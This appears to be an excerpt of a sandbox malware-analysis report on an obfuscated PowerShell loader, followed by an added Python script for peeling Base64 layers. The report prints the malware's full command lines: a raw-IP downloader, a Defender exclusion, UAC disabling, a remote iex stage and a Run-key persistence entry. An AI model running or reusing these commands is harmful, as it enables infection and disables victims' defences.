                  Source: Binary string: n.pdb source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: gement.Infrastructure.Native.pdb source: powershell.exe, 00000016.00000002.2783605754.0000000007190000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: n0C:\Windows\mscorlib.pdb source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000016.00000002.2804335664.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2936384962.000000000843F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: /C:\Users\user\AppData\Local\Temp\ilcg05nv.pdbhP source: powershell.exe, 00000004.00000002.2256554040.00000129015DE000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: ative.pdbou source: powershell.exe, 0000002B.00000002.2936384962.00000000084CD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: /C:\Users\user\AppData\Local\Temp\ilcg05nv.pdb source: powershell.exe, 00000004.00000002.2256554040.00000129015DE000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 364e35\Microsoft.Management.Infrastructure.Native.pdb& source: powershell.exe, 00000016.00000002.2806054422.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: indows\dll\mscorlib.pdb source: powershell.exe, 0000001E.00000002.2809296079.00000000081B0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: re.Native.pdb source: powershell.exe, 0000002B.00000002.2936384962.00000000084CD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: .pdba source: powershell.exe, 0000000D.00000002.3718811327.0000000008310000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32f source: powershell.exe, 0000001E.00000002.2807890146.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: %cqscorlib.pdbC source: powershell.exe, 00000016.00000002.2806054422.00000000080D0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: nC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb.0T source: powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: %%.pdb source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: ative.pdb source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: ative.pdbZ3 source: powershell.exe, 0000002B.00000002.2936384962.00000000084CD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2806054422.000000000804C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2783605754.0000000007190000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2793833295.00000000072DE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2936384962.00000000084BF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.Management.Infrastructure.Native.pdbev source: powershell.exe, 0000001E.00000002.2743365058.0000000002FE6000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb) source: powershell.exe, 0000001E.00000002.2809296079.000000000814A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 0000001E.00000002.2809296079.00000000081B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2936384962.00000000084CD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ::$DATAgement.Infrastructure.Native.pdb source: powershell.exe, 00000016.00000002.2783605754.0000000007190000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: nC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb.0d source: powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb8W source: powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: symbols\dll\mscorlib.pdbLb source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750439701.0000000004C6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.Management.Infrastructure.Native.pdb source: powershell.exe, 0000001E.00000002.2809296079.00000000081B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2936384962.0000000008491000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2936384962.00000000084CD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2936384962.00000000084C3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb| source: powershell.exe, 0000002B.00000002.2936384962.00000000084CD000.00000004.00000020.00020000.00000000.sdmp

                  Data Obfuscation

                  Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run(""C:\Windows\system32\cmd.exe""/C poWeRSHELL.eXe -EX ", "0")
                  Source: 22.2.powershell.exe.a16893c.11.raw.unpack, tjjjj.cs .Net Code: Main System.Reflection.Assembly.Load(byte[])
                  Source: 22.2.powershell.exe.a6c382c.7.raw.unpack, tjjjj.cs .Net Code: Main System.Reflection.Assembly.Load(byte[])
                  Source: 22.2.powershell.exe.96e0000.3.raw.unpack, tjjjj.cs .Net Code: Main System.Reflection.Assembly.Load(byte[])
                  Source: 22.2.powershell.exe.a15e2d4.12.raw.unpack, tjjjj.cs .Net Code: Main System.Reflection.Assembly.Load(byte[])
                  Source: 22.2.powershell.exe.a6a0b58.8.raw.unpack, tjjjj.cs .Net Code: Main System.Reflection.Assembly.Load(byte[])
                  Source: 22.2.powershell.exe.a26258c.6.raw.unpack, tjjjj.cs .Net Code: Main System.Reflection.Assembly.Load(byte[])
                  Source: 30.2.powershell.exe.a419e48.5.raw.unpack, tjjjj.cs .Net Code: Main System.Reflection.Assembly.Load(byte[])
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('QD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('QM', $false). DefineType('QT', 'Class,
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYj
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))"
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFVsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE
2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyRJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilcg05nv.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_04F17C50 push FFFFFFC3h; ret 13_2_04F17C6A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_04F1343F pushfd ; iretd 13_2_04F13459
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_04F13AD2 push ebx; retf 13_2_04F13ADA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_07748E48 push 800305D3h; ret 13_2_07749075
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_086D51C2 pushad ; retf 13_2_086D51D9
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\ilcg05nv.dll
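The powershell.exe command line listed above stacks two Base64 layers. The outer FromBase64String argument decodes to PowerShell that calls the same method through the reversed string 'gnirtS46esaBmorF'[-1..-16] -join '' (so the literal "FromBase64String" never appears in the command line); the argument of that call decodes to a script that adds a Defender exclusion for C:\ with Add-MpPreference, sets ConsentPromptBehaviorAdmin to 0 under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, runs Invoke-WebRequest against https://0x0.st/8-5S.ps1 and pipes the result to iex, and then defines an AES-CBC/PKCS7 decryption helper with a 32-byte key and 16-byte IV embedded as Base64 literals. The report view cuts the literal off mid-script, so any decoder has to cope with a truncated Base64 string. The Python below is an added example, not code from the sample or from Joe Sandbox: it peels such layers out of a command line, tolerates a cut-off literal, and reports which layer first contains the strings a responder would look for. The command line it analyses is constructed inline to mirror that structure; its script text and its placeholder URL are assumptions, not the sample's payload.

```python
"""Peel nested Base64/IEX layers out of an obfuscated PowerShell command line.

Added example for this report; not code from the sample or from Joe Sandbox.
The command line it analyses is constructed inline to mirror the structure in
the report; its script text and URL are assumptions, not the sample's payload.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional

# The sample hides the method name as 'gnirtS46esaBmorF'[-1..-16] -join ''
REVERSED_NAME = "gnirtS46esaBmorF"
assert REVERSED_NAME[::-1] == "FromBase64String"

# A Base64 literal handed either to the plain method or to the reversed-name
# call.  The closing quote is not required, so a literal cut off by the report
# view (as on this page) still matches; group 1 is the literal.
_B64_ARG = re.compile(
    r"(?:FromBase64String|\('gnirtS46esaBmorF'\[-1\.\.-16\]\s*-join\s*''\))"
    r"\s*\(\s*'([A-Za-z0-9+/=\r\n]+)"
)

# Strings worth flagging in any decoded layer (labels are mine, not Sigma titles).
INDICATORS = {
    "reversed_method_name": REVERSED_NAME,
    "remote_stage": "Invoke-WebRequest",
    "defender_exclusion": "Add-MpPreference",
    "uac_prompt_disabled": "ConsentPromptBehaviorAdmin",
    "aes_decrypt": "System.Security.Cryptography.Aes",
    "run_key": r"CurrentVersion\Run",
}


def decode_b64(literal: str) -> Optional[str]:
    """Decode a Base64 literal to text.  A trailing partial quantum is dropped
    first, so a truncated literal still yields its decodable prefix."""
    compact = re.sub(r"\s+", "", literal)
    compact = compact[: len(compact) - len(compact) % 4]
    try:
        return base64.b64decode(compact, validate=True).decode("utf-8", "replace")
    except binascii.Error:
        return None


def peel_layers(command_line: str, max_depth: int = 8) -> List[str]:
    """Return every decoded layer, outermost first (breadth-first, depth-bounded)."""
    layers: List[str] = []
    queue = [(command_line, 0)]
    while queue:
        text, depth = queue.pop(0)
        if depth >= max_depth:
            break
        for match in _B64_ARG.finditer(text):
            decoded = decode_b64(match.group(1))
            if decoded:
                layers.append(decoded)
                queue.append((decoded, depth + 1))
    return layers


def find_indicators(layers: List[str]) -> Dict[str, int]:
    """Map each indicator to the index of the first layer that contains it."""
    hits: Dict[str, int] = {}
    for idx, text in enumerate(layers):
        for name, needle in INDICATORS.items():
            if name not in hits and needle in text:
                hits[name] = idx
    return hits


def build_sample() -> str:
    """Construct a command line shaped like the report's (script text is assumed)."""
    stage2 = (
        'Add-MpPreference -ExclusionPath "C:\\"\n'
        'Set-ItemProperty -Path "HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion'
        '\\Policies\\System" -Name ConsentPromptBehaviorAdmin -Value 0\n'
    )
    b2 = base64.b64encode(stage2.encode()).decode()
    stage1 = (
        "IEX([Text.Encoding]::UTF8.GetString([Convert]::"
        f"('gnirtS46esaBmorF'[-1..-16] -join '')('{b2}')));"
        'iex (Invoke-WebRequest -Uri "https://example.invalid/stage.ps1")'
    )
    b1 = base64.b64encode(stage1.encode()).decode()
    outer = f"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('{b1}'))"
    return f'powershell.exe -noprofile -windowstyle hidden -ep bypass -Command "{outer}"'


if __name__ == "__main__":
    found = peel_layers(build_sample())
    for i, layer in enumerate(found):
        print(f"--- layer {i} ---\n{layer}")
    print(find_indicators(found))
```

Running it on the report's own command line (with the "Jump to behavior" residue stripped) recovers the outer layer in full and the inner script up to the point where the report view cuts it off; the reversed-name indicator fires on layer 0 and the Defender and UAC indicators on layer 1.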

                  Boot Survival

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate_589
